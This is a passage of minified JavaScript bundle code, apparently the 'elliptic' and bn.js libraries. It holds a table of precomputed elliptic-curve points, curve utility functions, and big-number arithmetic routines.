2d107bcfa09d8bcb9736a828cfa7fac8db17bf7a76a2c42ad961409018cf7"],["cee31cbf7e34ec379d94fb814d3d775ad954595d1314ba8846959e3e82f74e26","8fd64a14c06b589c26b947ae2bcf6bfa0149ef0be14ed4d80f448a01c43b1c6d"],["b4f9eaea09b6917619f6ea6a4eb5464efddb58fd45b1ebefcdc1a01d08b47986","39e5c9925b5a54b07433a4f18c61726f8bb131c012ca542eb24a8ac07200682a"],["d4263dfc3d2df923a0179a48966d30ce84e2515afc3dccc1b77907792ebcc60e","62dfaf07a0f78feb30e30d6295853ce189e127760ad6cf7fae164e122a208d54"],["48457524820fa65a4f8d35eb6930857c0032acc0a4a2de422233eeda897612c4","25a748ab367979d98733c38a1fa1c2e7dc6cc07db2d60a9ae7a76aaa49bd0f77"],["dfeeef1881101f2cb11644f3a2afdfc2045e19919152923f367a1767c11cceda","ecfb7056cf1de042f9420bab396793c0c390bde74b4bbdff16a83ae09a9a7517"],["6d7ef6b17543f8373c573f44e1f389835d89bcbc6062ced36c82df83b8fae859","cd450ec335438986dfefa10c57fea9bcc521a0959b2d80bbf74b190dca712d10"],["e75605d59102a5a2684500d3b991f2e3f3c88b93225547035af25af66e04541f","f5c54754a8f71ee540b9b48728473e314f729ac5308b06938360990e2bfad125"],["eb98660f4c4dfaa06a2be453d5020bc99a0c2e60abe388457dd43fefb1ed620c","6cb9a8876d9cb8520609af3add26cd20a0a7cd8a9411131ce85f44100099223e"],["13e87b027d8514d35939f2e6892b19922154596941888336dc3563e3b8dba942","fef5a3c68059a6dec5d624114bf1e91aac2b9da568d6abeb2570d55646b8adf1"],["ee163026e9fd6fe017c38f06a5be6fc125424b371ce2708e7bf4491691e5764a","1acb250f255dd61c43d94ccc670d0f58f49ae3fa15b96623e5430da0ad6c62b2"],["b268f5ef9ad51e4d78de3a750c2dc89b1e626d43505867999932e5db33af3d80","5f310d4b3c99b9ebb19f77d41c1dee018cf0d34fd4191614003e945a1216e423"],["ff07f3118a9df035e9fad85eb6c7bfe42b02f01ca99ceea3bf7ffdba93c4750d","438136d603e858a3a5c440c38eccbaddc1d2942114e2eddd4740d098ced1f0d8"],["8d8b9855c7c052a34146fd20ffb658bea4b9f69e0d825ebec16e8c3ce2b526a1","cdb559eedc2d79f926baf44fb84ea4d44bcf50fee51d7ceb30e2e7f463036758"],["52db0b5384dfbf05bfa9d472d7ae26dfe4b851ceca91b1eba54263180da32b63","c3b997d050ee5d423ebaf66a6db9f57b3180c902875679de924b69d84a7b375"],["e62f9490d3d51da6395efd24e80919cc7d0f29c3f3fa48c6fff543becbd43352","6d89ad7ba4876b0b22c2ca280c682862f342c8591f1daf5170e07bfd9ccafa7d"],["7f30ea2476b399b4957509c88f77d0191afa2ff5cb7b14fd6d8e7d65aaab1193","ca5ef7d4b231c94c3b15389a5f6311e9daff7bb67b103e9880ef4bff637acaec"],["5098ff1e1d9f14fb46a210fada6c903fef0fb7b4a1dd1d9ac60a0361800b7a00","9731141d81fc8f8084d37c6e7542006b3ee1b40d60dfe5362a5b132fd17ddc0"],["32b78c7de9ee512a72895be6b9cbefa6e2f3c4ccce445c96b9f2c81e2778ad58","ee1849f513df71e32efc3896ee28260c73bb80547ae2275ba497237794c8753c"],["e2cb74fddc8e9fbcd076eef2a7c72b0ce37d50f08269dfc074b581550547a4f7","d3aa2ed71c9dd2247a62df062736eb0baddea9e36122d2be8641abcb005cc4a4"],["8438447566d4d7bedadc299496ab357426009a35f235cb141be0d99cd10ae3a8","c4e1020916980a4da5d01ac5e6ad330734ef0d7906631c4f2390426b2edd791f"],["4162d488b89402039b584c6fc6c308870587d9c46f660b878ab65c82c711d67e","67163e903236289f776f22c25fb8a3afc1732f2b84b4e95dbda47ae5a0852649"],["3fad3fa84caf0f34f0f89bfd2dcf54fc175d767aec3e50684f3ba4a4bf5f683d","cd1bc7cb6cc407bb2f0ca647c718a730cf71872e7d0d2a53fa20efcdfe61826"],["674f2600a3007a00568c1a7ce05d0816c1fb84bf1370798f1c69532faeb1a86b","299d21f9413f33b3edf43b257004580b70db57da0b182259e09eecc69e0d38a5"],["d32f4da54ade74abb81b815ad1fb3b263d82d6c692714bcff87d29bd5ee9f08f","f9429e738b8e53b968e99016c059707782e14f4535359d582fc416910b3eea87"],["30e4e670435385556e593657135845d36fbb6931f72b08cb1ed954f1e3ce3ff6","462f9bce619898638499350113bbc9b10a878d35da70740dc695a559eb88db7b"],["be2062003c51cc3004682904330e4dee7f3dcd10b01e580bf1971b04d4cad297","62188bc49d61e5428573d48a74e1c655b1c61090905682a0d5558ed72dccb9bc"],["93144423ace3451ed29e0fb9ac2af211cb6e84a601df5993c419859fff5df04a","7c10dfb164c3425f5c71a3f9d7992038f1065224f72bb9d1d902a6d13037b47c"],["b015f8044f5fcbdcf21ca26d6c34fb8197829205c7b7d2a7cb66418c157b112c","ab8c1e086d04e813744a655b2df8d5f83b3cdc6faa3088c1d3aea1454e3a1d5f"],["d5e9e1da649d97d89e4868117a465a3a4f8a18de57a140d36b3f2af341a21b52","4cb04437f391ed73111a13cc1d4dd0db1693465c2240480d8955e8592f27447a"],["d3ae41047dd7ca065dbf8ed77b992439983005cd72e16d6f996a5316d36966bb","bd1aeb21ad22ebb22a10f0303417c6d964f8cdd7df0aca614b10dc14d125ac46"],["463e2763d885f958fc66cdd22800f0a487197d0a82e377b49f80af87c897b065","bfefacdb0e5d0fd7df3a311a94de062b26b80c61fbc97508b79992671ef7ca7f"],["7985fdfd127c0567c6f53ec1bb63ec3158e597c40bfe747c83cddfc910641917","603c12daf3d9862ef2b25fe1de289aed24ed291e0ec6708703a5bd567f32ed03"],["74a1ad6b5f76e39db2dd249410eac7f99e74c59cb83d2d0ed5ff1543da7703e9","cc6157ef18c9c63cd6193d83631bbea0093e0968942e8c33d5737fd790e0db08"],["30682a50703375f602d416664ba19b7fc9bab42c72747463a71d0896b22f6da3","553e04f6b018b4fa6c8f39e7f311d3176290d0e0f19ca73f17714d9977a22ff8"],["9e2158f0d7c0d5f26c3791efefa79597654e7a2b2464f52b1ee6c1347769ef57","712fcdd1b9053f09003a3481fa7762e9ffd7c8ef35a38509e2fbf2629008373"],["176e26989a43c9cfeba4029c202538c28172e566e3c4fce7322857f3be327d66","ed8cc9d04b29eb877d270b4878dc43c19aefd31f4eee09ee7b47834c1fa4b1c3"],["75d46efea3771e6e68abb89a13ad747ecf1892393dfc4f1b7004788c50374da8","9852390a99507679fd0b86fd2b39a868d7efc22151346e1a3ca4726586a6bed8"],["809a20c67d64900ffb698c4c825f6d5f2310fb0451c869345b7319f645605721","9e994980d9917e22b76b061927fa04143d096ccc54963e6a5ebfa5f3f8e286c1"],["1b38903a43f7f114ed4500b4eac7083fdefece1cf29c63528d563446f972c180","4036edc931a60ae889353f77fd53de4a2708b26b6f5da72ad3394119daf408f9"]]}}},7e3:(Pe,we,de)=>{"use strict";var ie=we,j=de(1959),$=de(490),ae=de(4108);ie.assert=$,ie.toArray=ae.toArray,ie.zero2=ae.zero2,ie.toHex=ae.toHex,ie.encode=ae.encode,ie.getNAF=function I(b,_,y){var M=new Array(Math.max(b.bitLength(),y)+1);M.fill(0);for(var p=1<<_+1,D=b.clone(),w=0;w<M.length;w++){var x,S=D.andln(p-1);D.isOdd()?D.isubn(x=S>(p>>1)-1?(p>>1)-S:S):x=0,M[w]=x,D.iushrn(1)}return M},ie.getJSF=function Q(b,_){var y=[[],[]];b=b.clone(),_=_.clone();for(var D,M=0,p=0;b.cmpn(-M)>0||_.cmpn(-p)>0;){var S,O,w=b.andln(3)+M&3,x=_.andln(3)+p&3;3===w&&(w=-1),3===x&&(x=-1),S=0==(1&w)?0:3!=(D=b.andln(7)+M&7)&&5!==D||2!==x?w:-w,y[0].push(S),O=0==(1&x)?0:3!=(D=_.andln(7)+p&7)&&5!==D||2!==w?x:-x,y[1].push(O),2*M===S+1&&(M=1-M),2*p===O+1&&(p=1-p),b.iushrn(1),_.iushrn(1)}return y},ie.cachedProperty=function F(b,_,y){var M="_"+_;b.prototype[_]=function(){return void 0!==this[M]?this[M]:this[M]=y.call(this)}},ie.parseBytes=function E(b){return"string"==typeof b?ie.toArray(b,"hex"):b},ie.intFromLE=function g(b){return new j(b,"hex","le")}},1959:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(5568).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var 